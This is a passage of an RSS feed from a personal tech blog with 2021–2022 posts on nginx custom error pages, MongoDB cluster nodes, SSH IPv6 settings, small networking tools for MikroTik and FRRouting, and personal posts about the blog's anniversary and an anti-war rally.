  2742.    <pubDate>Sun, 07 Aug 2022 22:19:00 +0200</pubDate>
  2743.    <category domain="">Linux</category>
  2744.    <description><![CDATA[<p><img src="" alt="How to Exit Vim" height="459" width="680"></p>
  2745. <p>(<a href="" title="Su-Shee (@sheeshee) / Twitter">via</a>)</p>
  2746. ]]></description>
  2747.    <content:encoded><![CDATA[<p><img src="" alt="How to Exit Vim" height="459" width="680"></p>
  2748. <p>(<a href="" title="Su-Shee (@sheeshee) / Twitter">via</a>)</p>
  2749. ]]></content:encoded>
  2750.  </item>
  2752.  <item>
  2753.    <title>Add node to MongoDB cluster</title>
  2754.    <link></link>
  2755.    <guid isPermaLink="true"></guid>
  2756.    <dc:creator>Andreas Jaggi</dc:creator>
  2757.    <creativeCommons:license></creativeCommons:license>
  2758.    <pubDate>Wed, 06 Jul 2022 22:14:00 +0200</pubDate>
  2759.    <category domain="">Linux</category>
  2760.    <description><![CDATA[<p>To add a new node to an existing <a href="" title="MongoDB">MongoDB</a> cluster, login to the mongo shell on the primary node and run the following command:</p>
  2761. <pre>rs.add({host:""})</pre>
  2762. <p>Similar to remove a node from the cluster, use:</p>
  2763. <pre>rs.remove("")</pre>
  2764. ]]></description>
  2765.    <content:encoded><![CDATA[<p>To add a new node to an existing <a href="" title="MongoDB">MongoDB</a> cluster, login to the mongo shell on the primary node and run the following command:</p>
  2766. <pre>rs.add({host:""})</pre>
  2767. <p>Similar to remove a node from the cluster, use:</p>
  2768. <pre>rs.remove("")</pre>
  2769. ]]></content:encoded>
  2770.  </item>
  2772.  <item>
  2773.    <title>Custom nginx error pages</title>
  2774.    <link></link>
  2775.    <guid isPermaLink="true"></guid>
  2776.    <dc:creator>Andreas Jaggi</dc:creator>
  2777.    <creativeCommons:license></creativeCommons:license>
  2778.    <pubDate>Sun, 19 Jun 2022 09:48:00 +0200</pubDate>
  2779.    <category domain="">Webdesign</category>
  2780.    <description><![CDATA[<p>For quite some time I've been using custom nginx error pages on this site.<br>
  2781. My approach so far was to generate a bunch of static HTML with the various error messages and then configure them for each corresponding HTTP status codes in nginx.<br>As there are quite a number of HTTP errors, I used a little shell script to generate the whole config and HTML, in the end I had a huge file with snippets like the one below.</p>
  2782. <pre>
  2783. error_page 429 @custom_error_429;
  2784. location @custom_error_429 {
  2785. internal;
  2786. more_set_headers 'Content-Type: text/html';
  2787. echo '&lt;html&gt;...&lt;/html&gt;';
  2788. }
  2789. </pre>
  2791. <p>Now while implementing custom error pages for a different project, I tried to see if there is an easier way to do this.<br>
  2792. Some searching lead to the <a href="" title="One NGINX error page to rule them all - Adriaan's blog">One NGINX error page to rule them all</a> article which describes an alternative approach leveraging the nginx <abbr title="Server Side Includes">SSI</abbr> module to generate the error pages on the fly.</p>
  2793. <p>
  2794. Instead of generating and defining a specific error page for each error, a single error page is used for all errors.
  2795. </p>
  2796. <pre>
  2797. error_page 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414
  2798.           415 416 417 418 421 422 423 424 425 426 428 429 431 451 500
  2799.           501 502 503 504 505 506 507 508 510 511 /error.html;
  2801. location = /error.html {
  2802. ssi on;
  2803. internal;
  2804. root /var/www/default;
  2805. }
  2806. </pre>
  2807. <p>nginx provides the status code as variable to our error page, but we also need the error message to make it more userfriendly.<br>
  2808. For this we define a mapping of status codes to the error messages.</p>
  2809. <pre>
  2810. map $status $status_text {
  2811.  400 'Bad Request';
  2812.  401 'Unauthorized';
  2813.  402 'Payment Required';
  2814.  403 'Forbidden';
  2815.  404 'Not Found';
  2816.  405 'Method Not Allowed';
  2817.  406 'Not Acceptable';
  2818.  407 'Proxy Authentication Required';
  2819.  408 'Request Timeout';
  2820.  409 'Conflict';
  2821.  410 'Gone';
  2822.  411 'Length Required';
  2823.  412 'Precondition Failed';
  2824.  413 'Payload Too Large';
  2825.  414 'URI Too Long';
  2826.  415 'Unsupported Media Type';
  2827.  416 'Range Not Satisfiable';
  2828.  417 'Expectation Failed';
  2829.  418 'I\'m a teapot';
  2830.  421 'Misdirected Request';
  2831.  422 'Unprocessable Entity';
  2832.  423 'Locked';
  2833.  424 'Failed Dependency';
  2834.  425 'Too Early';
  2835.  426 'Upgrade Required';
  2836.  428 'Precondition Required';
  2837.  429 'Too Many Requests';
  2838.  431 'Request Header Fields Too Large';
  2839.  451 'Unavailable For Legal Reasons';
  2840.  500 'Internal Server Error';
  2841.  501 'Not Implemented';
  2842.  502 'Bad Gateway';
  2843.  503 'Service Unavailable';
  2844.  504 'Gateway Timeout';
  2845.  505 'HTTP Version Not Supported';
  2846.  506 'Variant Also Negotiates';
  2847.  507 'Insufficient Storage';
  2848.  508 'Loop Detected';
  2849.  510 'Not Extended';
  2850.  511 'Network Authentication Required';
  2851.  default 'Something went wrong';
  2852. }
  2853. </pre>
  2855. <p>Now we have the <var>status</var> and the <var>status_text</var> variables available in our error.html page.</p>
  2856. <pre>
  2857. &lt;html&gt;&lt;body&gt;
  2858. &lt;h1&gt;&lt;!--# echo var="status" default="" --&gt;
  2859. &lt;!--# echo var="status_text" default="Something went wrong" --&gt;&lt;/h1&gt;
  2860. &lt;/body&gt;&lt;/html&gt;
  2861. </pre>
  2862. ]]></description>
  2863.    <content:encoded><![CDATA[<p>For quite some time I've been using custom nginx error pages on this site.<br>
  2864. My approach so far was to generate a bunch of static HTML with the various error messages and then configure them for each corresponding HTTP status codes in nginx.<br>As there are quite a number of HTTP errors, I used a little shell script to generate the whole config and HTML, in the end I had a huge file with snippets like the one below.</p>
  2865. <pre>
  2866. error_page 429 @custom_error_429;
  2867. location @custom_error_429 {
  2868. internal;
  2869. more_set_headers 'Content-Type: text/html';
  2870. echo '&lt;html&gt;...&lt;/html&gt;';
  2871. }
  2872. </pre>
  2874. <p>Now while implementing custom error pages for a different project, I tried to see if there is an easier way to do this.<br>
  2875. Some searching lead to the <a href="" title="One NGINX error page to rule them all - Adriaan's blog">One NGINX error page to rule them all</a> article which describes an alternative approach leveraging the nginx <abbr title="Server Side Includes">SSI</abbr> module to generate the error pages on the fly.</p>
  2876. <p>
  2877. Instead of generating and defining a specific error page for each error, a single error page is used for all errors.
  2878. </p>
  2879. <pre>
  2880. error_page 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414
  2881.           415 416 417 418 421 422 423 424 425 426 428 429 431 451 500
  2882.           501 502 503 504 505 506 507 508 510 511 /error.html;
  2884. location = /error.html {
  2885. ssi on;
  2886. internal;
  2887. root /var/www/default;
  2888. }
  2889. </pre>
  2890. <p>nginx provides the status code as variable to our error page, but we also need the error message to make it more userfriendly.<br>
  2891. For this we define a mapping of status codes to the error messages.</p>
  2892. <pre>
  2893. map $status $status_text {
  2894.  400 'Bad Request';
  2895.  401 'Unauthorized';
  2896.  402 'Payment Required';
  2897.  403 'Forbidden';
  2898.  404 'Not Found';
  2899.  405 'Method Not Allowed';
  2900.  406 'Not Acceptable';
  2901.  407 'Proxy Authentication Required';
  2902.  408 'Request Timeout';
  2903.  409 'Conflict';
  2904.  410 'Gone';
  2905.  411 'Length Required';
  2906.  412 'Precondition Failed';
  2907.  413 'Payload Too Large';
  2908.  414 'URI Too Long';
  2909.  415 'Unsupported Media Type';
  2910.  416 'Range Not Satisfiable';
  2911.  417 'Expectation Failed';
  2912.  418 'I\'m a teapot';
  2913.  421 'Misdirected Request';
  2914.  422 'Unprocessable Entity';
  2915.  423 'Locked';
  2916.  424 'Failed Dependency';
  2917.  425 'Too Early';
  2918.  426 'Upgrade Required';
  2919.  428 'Precondition Required';
  2920.  429 'Too Many Requests';
  2921.  431 'Request Header Fields Too Large';
  2922.  451 'Unavailable For Legal Reasons';
  2923.  500 'Internal Server Error';
  2924.  501 'Not Implemented';
  2925.  502 'Bad Gateway';
  2926.  503 'Service Unavailable';
  2927.  504 'Gateway Timeout';
  2928.  505 'HTTP Version Not Supported';
  2929.  506 'Variant Also Negotiates';
  2930.  507 'Insufficient Storage';
  2931.  508 'Loop Detected';
  2932.  510 'Not Extended';
  2933.  511 'Network Authentication Required';
  2934.  default 'Something went wrong';
  2935. }
  2936. </pre>
  2938. <p>Now we have the <var>status</var> and the <var>status_text</var> variables available in our error.html page.</p>
  2939. <pre>
  2940. &lt;html&gt;&lt;body&gt;
  2941. &lt;h1&gt;&lt;!--# echo var="status" default="" --&gt;
  2942. &lt;!--# echo var="status_text" default="Something went wrong" --&gt;&lt;/h1&gt;
  2943. &lt;/body&gt;&lt;/html&gt;
  2944. </pre>
  2945. ]]></content:encoded>
  2946.  </item>
  2948.  <item>
  2949.    <title>nitter</title>
  2950.    <link></link>
  2951.    <guid isPermaLink="true"></guid>
  2952.    <dc:creator>Andreas Jaggi</dc:creator>
  2953.    <creativeCommons:license></creativeCommons:license>
  2954.    <pubDate>Wed, 15 Jun 2022 21:08:00 +0200</pubDate>
  2955.    <category domain="">Misc</category>
  2956.    <description><![CDATA[<p><a href="" title="nitter">nitter</a> provides a free and open source alternative front-end to Twitter. It talks with the API and does not show any JavaScript or ads (thus no 'forced-login' overlay after reading 5 tweets or similar nastiness).<br>
  2957. The source code for it is available on <a href="" title="">GitHub</a>.</p>
  2958. <p>It does a direct mapping of the profile URLs, thus <code></code> becomes <code>https://<b></b>/sheeshee</code></p>
  2959. ]]></description>
  2960.    <content:encoded><![CDATA[<p><a href="" title="nitter">nitter</a> provides a free and open source alternative front-end to Twitter. It talks with the API and does not show any JavaScript or ads (thus no 'forced-login' overlay after reading 5 tweets or similar nastiness).<br>
  2961. The source code for it is available on <a href="" title="">GitHub</a>.</p>
  2962. <p>It does a direct mapping of the profile URLs, thus <code></code> becomes <code>https://<b></b>/sheeshee</code></p>
  2963. ]]></content:encoded>
  2964.  </item>
  2966.  <item>
  2967.    <title>Blogging like 2002</title>
  2968.    <link></link>
  2969.    <guid isPermaLink="true"></guid>
  2970.    <dc:creator>Andreas Jaggi</dc:creator>
  2971.    <creativeCommons:license></creativeCommons:license>
  2972.    <pubDate>Sat, 04 Jun 2022 11:32:00 +0200</pubDate>
  2973.    <category domain="">Webdesign</category>
  2974.    <description><![CDATA[<p>On the occasion of the <a href="" title="Happy 20th Birthday x-log">20th anniversary of this blog</a>, I've used <a href="" title="Internet Archive"></a> to reconstruct the original HTML layout from back in the time and applied it to the Jekyll templates.</p>
  2975. <p>Enjoy the blog in all the (&lt;table&gt; based) glory from 2002 :-)</p>
  2976. ]]></description>
  2977.    <content:encoded><![CDATA[<p>On the occasion of the <a href="" title="Happy 20th Birthday x-log">20th anniversary of this blog</a>, I've used <a href="" title="Internet Archive"></a> to reconstruct the original HTML layout from back in the time and applied it to the Jekyll templates.</p>
  2978. <p>Enjoy the blog in all the (&lt;table&gt; based) glory from 2002 :-)</p>
  2979. ]]></content:encoded>
  2980.  </item>
  2982.  <item>
  2983.    <title>Happy 20th Birthday x-log</title>
  2984.    <link></link>
  2985.    <guid isPermaLink="true"></guid>
  2986.    <dc:creator>Andreas Jaggi</dc:creator>
  2987.    <creativeCommons:license></creativeCommons:license>
  2988.    <pubDate>Thu, 02 Jun 2022 22:54:00 +0200</pubDate>
  2989.    <category domain="">Misc</category>
  2990.    <description><![CDATA[<p>On June 2nd 2002 I published the first (test) entry in this weblog. The first entry has disappeared since (thus making <a href="" title="Flash-Sites">the second entry</a> the first one in the <a href="" title="x-log - Archive - 2002-06" >archive of June 2002</a>).</p>
  2991. <p><img src="" alt="Screenshot of the first (test) entry" height="59" width="290"></p>
  2992. <p>Compared to <a href="" title=" x-log about page from 2002">20 years ago</a>, the about page no longer needs to explain what a weblog is.<br>
  2993. Interesting though that the linked <a href="" title=" Peter Praschl: Was ist eigentlich ein Weblog?">definition of a weblog</a> from back then already did foresee the rise and fall in popularity of weblogs which happend during the last two decades.<br>To me it seems in the last 1-2 years there has been an increase again in activity around personal weblogs; curious to see if this revival trend continues.
  2994. </p>
  2995. <p>Also the weblog here has changed quite a bit. Initially its content was more on the pure web-logging side (commenting on interesting links I encountered during my daily Internet surfing) mixed with some kind of a journal/commentary of my day-to-day life. Later on it moved more towards a 'knowledge dump' on technical topics mixed with some music discoveries and random personal post from festivals and travels. And lately it has been rather sparse again with posts, still mostly on technical topics around coding, networking, security mixed with some personal posts commenting on the current world situation.<br>The frequency of posts also followed the changes in content where early on there sometimes were multiple posts per day, nowadays there can be multiple months without any post and there were even entire years where nothing new was posted; let's see how this goes in the future :-)</p>
  2996. <p>From the list of linked Blogs in 2002, only deep-resonance aka <a href="" title="Markus Kniebes">mk</a> is still active, special shout-out to <a href="">Markus</a> for the continuous persistence.<br>To the next twenty years :-)</p>
  2997. ]]></description>
  2998.    <content:encoded><![CDATA[<p>On June 2nd 2002 I published the first (test) entry in this weblog. The first entry has disappeared since (thus making <a href="" title="Flash-Sites">the second entry</a> the first one in the <a href="" title="x-log - Archive - 2002-06" >archive of June 2002</a>).</p>
  2999. <p><img src="" alt="Screenshot of the first (test) entry" height="59" width="290"></p>
  3000. <p>Compared to <a href="" title=" x-log about page from 2002">20 years ago</a>, the about page no longer needs to explain what a weblog is.<br>
  3001. Interesting though that the linked <a href="" title=" Peter Praschl: Was ist eigentlich ein Weblog?">definition of a weblog</a> from back then already did foresee the rise and fall in popularity of weblogs which happend during the last two decades.<br>To me it seems in the last 1-2 years there has been an increase again in activity around personal weblogs; curious to see if this revival trend continues.
  3002. </p>
  3003. <p>Also the weblog here has changed quite a bit. Initially its content was more on the pure web-logging side (commenting on interesting links I encountered during my daily Internet surfing) mixed with some kind of a journal/commentary of my day-to-day life. Later on it moved more towards a 'knowledge dump' on technical topics mixed with some music discoveries and random personal post from festivals and travels. And lately it has been rather sparse again with posts, still mostly on technical topics around coding, networking, security mixed with some personal posts commenting on the current world situation.<br>The frequency of posts also followed the changes in content where early on there sometimes were multiple posts per day, nowadays there can be multiple months without any post and there were even entire years where nothing new was posted; let's see how this goes in the future :-)</p>
  3004. <p>From the list of linked Blogs in 2002, only deep-resonance aka <a href="" title="Markus Kniebes">mk</a> is still active, special shout-out to <a href="">Markus</a> for the continuous persistence.<br>To the next twenty years :-)</p>
  3005. ]]></content:encoded>
  3006.  </item>
  3008.  <item>
  3009.    <title>mt-set-time</title>
  3010.    <link></link>
  3011.    <guid isPermaLink="true"></guid>
  3012.    <dc:creator>Andreas Jaggi</dc:creator>
  3013.    <creativeCommons:license></creativeCommons:license>
  3014.    <pubDate>Sat, 26 Mar 2022 16:15:00 +0100</pubDate>
  3015.    <category domain="">Networking</category>
  3016.    <description><![CDATA[<p>A while ago I wrote a little tool to set the time on <a href="" title="MikroTik Routers and Wireless">MikroTik</a> devices.
  3017. It takes the current time from the local machine and does set it on the device through the API (while respecting the timezone configured on it).<br>
  3018. I mostly use it to set the proper time when the device time was completely off (when setting up a new device or when it has been powered off for a long time).
  3019. Afterwards NTP should take care of keeping the time in sync.</p>
  3020. <p>The tool is now available on GitHub together with installation and usage instructions: <a href="" title="x-way/mt-set-time: Set time on MikroTik routers">mt-set-time</a></p>
  3021. ]]></description>
  3022.    <content:encoded><![CDATA[<p>A while ago I wrote a little tool to set the time on <a href="" title="MikroTik Routers and Wireless">MikroTik</a> devices.
  3023. It takes the current time from the local machine and does set it on the device through the API (while respecting the timezone configured on it).<br>
  3024. I mostly use it to set the proper time when the device time was completely off (when setting up a new device or when it has been powered off for a long time).
  3025. Afterwards NTP should take care of keeping the time in sync.</p>
  3026. <p>The tool is now available on GitHub together with installation and usage instructions: <a href="" title="x-way/mt-set-time: Set time on MikroTik routers">mt-set-time</a></p>
  3027. ]]></content:encoded>
  3028.  </item>
  3030.  <item>
  3031.    <title>Fight Putin - Ride a Bike</title>
  3032.    <link></link>
  3033.    <guid isPermaLink="true"></guid>
  3034.    <dc:creator>Andreas Jaggi</dc:creator>
  3035.    <creativeCommons:license></creativeCommons:license>
  3036.    <pubDate>Tue, 15 Mar 2022 12:55:00 +0100</pubDate>
  3037.    <category domain="">Misc</category>
  3038.    <description><![CDATA[<p><a href="" title="Fight Putin - Ride a Bike"><img src="" alt="Fight Putin - Ride a Bike" height="515" width="300"></a></p>
  3039. ]]></description>
  3040.    <content:encoded><![CDATA[<p><a href="" title="Fight Putin - Ride a Bike"><img src="" alt="Fight Putin - Ride a Bike" height="515" width="300"></a></p>
  3041. ]]></content:encoded>
  3042.  </item>
  3044.  <item>
  3045.    <title>Dr Putin isch</title>
  3046.    <link></link>
  3047.    <guid isPermaLink="true"></guid>
  3048.    <dc:creator>Andreas Jaggi</dc:creator>
  3049.    <creativeCommons:license></creativeCommons:license>
  3050.    <pubDate>Sun, 27 Feb 2022 11:53:00 +0100</pubDate>
  3051.    <category domain="">Music</category>
  3052.    <description><![CDATA[<p><a href="" title="Dr Putin isch e Hueresohn - YouTube">Dr Putin isch e Hueresohn</a></p>
  3053. <p>(<a href="" title="/r/BUENZLI on">via</a>)</p>
  3054. ]]></description>
  3055.    <content:encoded><![CDATA[<p><a href="" title="Dr Putin isch e Hueresohn - YouTube">Dr Putin isch e Hueresohn</a></p>
  3056. <p>(<a href="" title="/r/BUENZLI on">via</a>)</p>
  3057. ]]></content:encoded>
  3058.  </item>
  3060.  <item>
  3061.    <title>Non à la guerre! Nein zum Krieg!</title>
  3062.    <link></link>
  3063.    <guid isPermaLink="true"></guid>
  3064.    <dc:creator>Andreas Jaggi</dc:creator>
  3065.    <creativeCommons:license></creativeCommons:license>
  3066.    <pubDate>Sat, 26 Feb 2022 21:22:00 +0100</pubDate>
  3067.    <category domain="">Misc</category>
  3068.    <description><![CDATA[<p>Today I went to Bern to the <a href="" title="Ukraine: up to 20'000 people march in Bern for peace">rally for peace</a>.<br>
  3069. My motivation was to show support for the people suffering in this war and to send a signal to our swiss government that the population wants clear participation in sanctions (while remaining neutral, the two in my view are not exclusive!).</p>
  3070. <p>Swiss media reported that this was the largest rally for peace in Switzerland since the <a href="" title="x-log - Tous ensemble, tous ensemble, non à la guerre!">rallies against the war in Iraq in 2003</a>. That I can link to my own blog entry regarding the rally for peace from 19 years ago, makes me sad.<br>
  3071. Clearly we as human species did not progress enough on this topic :-(</p>
  3072. <p>Besides showing up to the rally, I also did donate to the <a href="" title="International Committee of the Red Cross">ICRC</a> to provide humanitarian aid and I do encourage you to do the same.</p>
  3073. ]]></description>
  3074.    <content:encoded><![CDATA[<p>Today I went to Bern to the <a href="" title="Ukraine: up to 20'000 people march in Bern for peace">rally for peace</a>.<br>
  3075. My motivation was to show support for the people suffering in this war and to send a signal to our swiss government that the population wants clear participation in sanctions (while remaining neutral, the two in my view are not exclusive!).</p>
  3076. <p>Swiss media reported that this was the largest rally for peace in Switzerland since the <a href="" title="x-log - Tous ensemble, tous ensemble, non à la guerre!">rallies against the war in Iraq in 2003</a>. That I can link to my own blog entry regarding the rally for peace from 19 years ago, makes me sad.<br>
  3077. Clearly we as human species did not progress enough on this topic :-(</p>
  3078. <p>Besides showing up to the rally, I also did donate to the <a href="" title="International Committee of the Red Cross">ICRC</a> to provide humanitarian aid and I do encourage you to do the same.</p>
  3079. ]]></content:encoded>
  3080.  </item>
  3082.  <item>
  3083.    <title>EFF Member Badge 2022</title>
  3084.    <link></link>
  3085.    <guid isPermaLink="true"></guid>
  3086.    <dc:creator>Andreas Jaggi</dc:creator>
  3087.    <creativeCommons:license></creativeCommons:license>
  3088.    <pubDate>Sun, 20 Feb 2022 09:22:00 +0100</pubDate>
  3089.    <category domain="">Badges</category>
  3090.    <description><![CDATA[<p><a href="" title="Electronic Frontier Foundation | Defending your rights in the digital world"><img src="" alt="EFF Member Badge 2022" height="300" width="300"></a></p>
  3091. ]]></description>
  3092.    <content:encoded><![CDATA[<p><a href="" title="Electronic Frontier Foundation | Defending your rights in the digital world"><img src="" alt="EFF Member Badge 2022" height="300" width="300"></a></p>
  3093. ]]></content:encoded>
  3094.  </item>
  3096.  <item>
  3097.    <title>vtysock</title>
  3098.    <link></link>
  3099.    <guid isPermaLink="true"></guid>
  3100.    <dc:creator>Andreas Jaggi</dc:creator>
  3101.    <creativeCommons:license></creativeCommons:license>
  3102.    <pubDate>Sat, 29 Jan 2022 21:38:00 +0100</pubDate>
  3103.    <category domain="">Networking</category>
  3104.    <description><![CDATA[<p>After switching my Debian hosts from <a href="" title="Quagga Software Routing Suite">Quagga</a> to <a href="" title="FRRouting">FRRouting</a>, I noticed that running vtysh has become quite a bit slower especially when making multiple calls to it from my status/monitoring scripts.
  3105. <br>This has also been observed by other users of FRRouting (there's an open issue in their bugtracker: <a href="" title="vtysh is significantly slower in FRR than Quagga">#7799</a>).</p>
  3106. <p>The Prometheus <a href="" title="Prometheus exporter for Free Range Routing">frr_exporter</a> works around this by directly sending commands to the UNIX sockets of the FRR daemons (<a href="" title="frr_exporter - refactor: send cmds to unix socket">PR</a>).</p>
  3107. <p>To use the same approach in my monitoring scripts, I wrote a small utility which acts as a drop-in replacement for vtysh and sends the commands directly to the UNIX sockets of the FRR daemons: <a href="" title="x-way/vtysock - a quick vtysh replacement">vtysock</a>
  3108. <br>By skipping the parsing and validation checks done in vtysh, vtysock can achieve a significant speed improvement when executing commands.</p>
  3109. ]]></description>
  3110.    <content:encoded><![CDATA[<p>After switching my Debian hosts from <a href="" title="Quagga Software Routing Suite">Quagga</a> to <a href="" title="FRRouting">FRRouting</a>, I noticed that running vtysh has become quite a bit slower especially when making multiple calls to it from my status/monitoring scripts.
  3111. <br>This has also been observed by other users of FRRouting (there's an open issue in their bugtracker: <a href="" title="vtysh is significantly slower in FRR than Quagga">#7799</a>).</p>
  3112. <p>The Prometheus <a href="" title="Prometheus exporter for Free Range Routing">frr_exporter</a> works around this by directly sending commands to the UNIX sockets of the FRR daemons (<a href="" title="frr_exporter - refactor: send cmds to unix socket">PR</a>).</p>
  3113. <p>To use the same approach in my monitoring scripts, I wrote a small utility which acts as a drop-in replacement for vtysh and sends the commands directly to the UNIX sockets of the FRR daemons: <a href="" title="x-way/vtysock - a quick vtysh replacement">vtysock</a>
  3114. <br>By skipping the parsing and validation checks done in vtysh, vtysock can achieve a significant speed improvement when executing commands.</p>
  3115. ]]></content:encoded>
  3116.  </item>
  3118.  <item>
  3119.    <title>Force SSH to use IPv6</title>
  3120.    <link></link>
  3121.    <guid isPermaLink="true"></guid>
  3122.    <dc:creator>Andreas Jaggi</dc:creator>
  3123.    <creativeCommons:license></creativeCommons:license>
  3124.    <pubDate>Sun, 23 Jan 2022 10:53:00 +0100</pubDate>
  3125.    <category domain="">Networking</category>
  3126.    <description><![CDATA[<p>In situations where IPv6 connectivity performs better than IPv4, you might want to force SSH to use IPv6. In interactive mode this can be achieved with the <code>-6</code> commandline parameter.<br>But in situations where you can't modify the commandline parameters a different approach is needed (for example in rsync backup scripts which use SSH as underlying transport layer).</p>
  3127. <p>We can use the <a href="" title="ssh_config(5) - OpenBSD manual pages">ssh_config</a> file to encforce that IPv6 is used for a specific host:</p>
  3128. <pre>
  3129. Host myipv6host
  3130. AddressFamily inet6
  3131. </pre>
  3132. <p>This instructs all SSH commands to use IPv6 when connecting to myipv6host.</p>
  3133. <p>The same approach also works to force usage of <a href="">Legacy IP</a> by specyfing <code>inet</code> as address family.</p>
  3134. ]]></description>
  3135.    <content:encoded><![CDATA[<p>In situations where IPv6 connectivity performs better than IPv4, you might want to force SSH to use IPv6. In interactive mode this can be achieved with the <code>-6</code> commandline parameter.<br>But in situations where you can't modify the commandline parameters a different approach is needed (for example in rsync backup scripts which use SSH as underlying transport layer).</p>
  3136. <p>We can use the <a href="" title="ssh_config(5) - OpenBSD manual pages">ssh_config</a> file to encforce that IPv6 is used for a specific host:</p>
  3137. <pre>
  3138. Host myipv6host
  3139. AddressFamily inet6
  3140. </pre>
  3141. <p>This instructs all SSH commands to use IPv6 when connecting to myipv6host.</p>
  3142. <p>The same approach also works to force usage of <a href="">Legacy IP</a> by specyfing <code>inet</code> as address family.</p>
  3143. ]]></content:encoded>
  3144.  </item>
  3146.  <item>
  3147.    <title>Google Analytics removed</title>
  3148.    <link></link>
  3149.    <guid isPermaLink="true"></guid>
  3150.    <dc:creator>Andreas Jaggi</dc:creator>
  3151.    <creativeCommons:license></creativeCommons:license>
  3152.    <pubDate>Wed, 19 Jan 2022 22:45:00 +0100</pubDate>
  3153.    <category domain="">Webdesign</category>
  3154.    <description><![CDATA[<p>After running it for a bit more than a decade, I've now removed again the Google Analytics tracking from this site. It does not feel appropriate anymore on a personal website.<br>At the moment no alternative statistics solution is in place yet, but I could imagine setting up a self-hosted solution like <a href="" title="Matomo Analytics - The Google Analytics alternative that protects your data">Matomo</a> or <a href="" title="Plausible Analytics | Simple, privacy-friendly Google Analytics alternative">Plausible</a> in the future.</p>
  3155. ]]></description>
  3156.    <content:encoded><![CDATA[<p>After running it for a bit more than a decade, I've now removed again the Google Analytics tracking from this site. It does not feel appropriate anymore on a personal website.<br>At the moment no alternative statistics solution is in place yet, but I could imagine setting up a self-hosted solution like <a href="" title="Matomo Analytics - The Google Analytics alternative that protects your data">Matomo</a> or <a href="" title="Plausible Analytics | Simple, privacy-friendly Google Analytics alternative">Plausible</a> in the future.</p>
  3157. ]]></content:encoded>
  3158.  </item>
  3160.  <item>
  3161.    <title>Google Analytics declared illegal in the EU</title>
  3162.    <link></link>
  3163.    <guid isPermaLink="true"></guid>
  3164.    <dc:creator>Andreas Jaggi</dc:creator>
  3165.    <creativeCommons:license></creativeCommons:license>
  3166.    <pubDate>Wed, 19 Jan 2022 20:45:00 +0100</pubDate>
  3167.    <category domain="">Webdesign</category>
  3168.    <description><![CDATA[<p><a href="" title="Google Analytics declared illegal in the EU">Google Analytics declared illegal in the EU</a>.</p>
  3169. ]]></description>
  3170.    <content:encoded><![CDATA[<p><a href="" title="Google Analytics declared illegal in the EU">Google Analytics declared illegal in the EU</a>.</p>
  3171. ]]></content:encoded>
  3172.  </item>
  3174.  <item>
  3175.    <title>Wordle</title>
  3176.    <link></link>
  3177.    <guid isPermaLink="true"></guid>
  3178.    <dc:creator>Andreas Jaggi</dc:creator>
  3179.    <creativeCommons:license></creativeCommons:license>
  3180.    <pubDate>Wed, 05 Jan 2022 07:09:00 +0100</pubDate>
  3181.    <category domain="">Misc</category>
  3182.    <description><![CDATA[<p><a href="" title="Wordle - A daily word game">Wordle</a> seems to be the trending topic these days.<br>It's a word game similar to the french <a href="" title="Motus - Wikipedia">Motus</a> game show (resp. the american <a href="" title="Lingo - Wikipedia">Lingo</a> game show).</p>
  3183. <p>Wordle 200 4/6<br>
  3184. <br>
  3185. ⬜⬜⬜🟩⬜<br>
  3186. ⬜⬜🟨🟩⬜<br>
  3187. ⬜⬜⬜🟩🟩<br>
  3188. 🟩🟩🟩🟩🟩<br>
  3189. </p>
  3190. ]]></description>
  3191.    <content:encoded><![CDATA[<p><a href="" title="Wordle - A daily word game">Wordle</a> seems to be the trending topic these days.<br>It's a word game similar to the french <a href="" title="Motus - Wikipedia">Motus</a> game show (resp. the american <a href="" title="Lingo - Wikipedia">Lingo</a> game show).</p>
  3192. <p>Wordle 200 4/6<br>
  3193. <br>
  3194. ⬜⬜⬜🟩⬜<br>
  3195. ⬜⬜🟨🟩⬜<br>
  3196. ⬜⬜⬜🟩🟩<br>
  3197. 🟩🟩🟩🟩🟩<br>
  3198. </p>
  3199. ]]></content:encoded>
  3200.  </item>
  3202.  <item>
  3203.    <title>Y2K22</title>
  3204.    <link></link>
  3205.    <guid isPermaLink="true"></guid>
  3206.    <dc:creator>Andreas Jaggi</dc:creator>
  3207.    <creativeCommons:license></creativeCommons:license>
  3208.    <pubDate>Sat, 01 Jan 2022 21:48:00 +0100</pubDate>
  3209.    <category domain="">Coding</category>
  3210.    <description><![CDATA[<p>Turns out that signed 32-bit numbers can be exhausted long before <a href="" title="Year 2038 problem">Y2038</a>, when you use them to store time in YYMMDDHHMM format. (<a href="" title="rachelbythebay - YYMMDDHHMM just overflowed a signed 32 bit int">via</a>)</p>
  3211. ]]></description>
  3212.    <content:encoded><![CDATA[<p>Turns out that signed 32-bit numbers can be exhausted long before <a href="" title="Year 2038 problem">Y2038</a>, when you use them to store time in YYMMDDHHMM format. (<a href="" title="rachelbythebay - YYMMDDHHMM just overflowed a signed 32 bit int">via</a>)</p>
  3213. ]]></content:encoded>
  3214.  </item>
  3216.  <item>
  3217.    <title>Open Source on Mars</title>
  3218.    <link></link>
  3219.    <guid isPermaLink="true"></guid>
  3220.    <dc:creator>Andreas Jaggi</dc:creator>
  3221.    <creativeCommons:license></creativeCommons:license>
  3222.    <pubDate>Mon, 19 Apr 2021 16:21:00 +0200</pubDate>
  3223.    <category domain="">Coding</category>
  3224.    <description><![CDATA[<p>Received a badge from GitHub's <a href="" title="Open Source on Mars: Community powers NASA’s Ingenuity Helicopter - The ReadMe Project">Open Source on Mars</a> <a href="" title="Open source goes to Mars - The GitHub Blog">initiative</a> :-)</p>
  3226. <p><a href=""><img src="" alt="Mars 2020 Helicopter Contributor - Andreas Jaggi contributed code to 1 repository used in the Mars 2020 Helicopter Mission: torvalds/linux" title="Mars 2020 Helicopter Contributor - Andreas Jaggi contributed code to 1 repository used in the Mars 2020 Helicopter Mission: torvalds/linux" width="333" height="117"></a></p>
  3227. ]]></description>
  3228.    <content:encoded><![CDATA[<p>Received a badge from GitHub's <a href="" title="Open Source on Mars: Community powers NASA’s Ingenuity Helicopter - The ReadMe Project">Open Source on Mars</a> <a href="" title="Open source goes to Mars - The GitHub Blog">initiative</a> :-)</p>
  3230. <p><a href=""><img src="" alt="Mars 2020 Helicopter Contributor - Andreas Jaggi contributed code to 1 repository used in the Mars 2020 Helicopter Mission: torvalds/linux" title="Mars 2020 Helicopter Contributor - Andreas Jaggi contributed code to 1 repository used in the Mars 2020 Helicopter Mission: torvalds/linux" width="333" height="117"></a></p>
  3231. ]]></content:encoded>
  3232.  </item>
  3234.  <item>
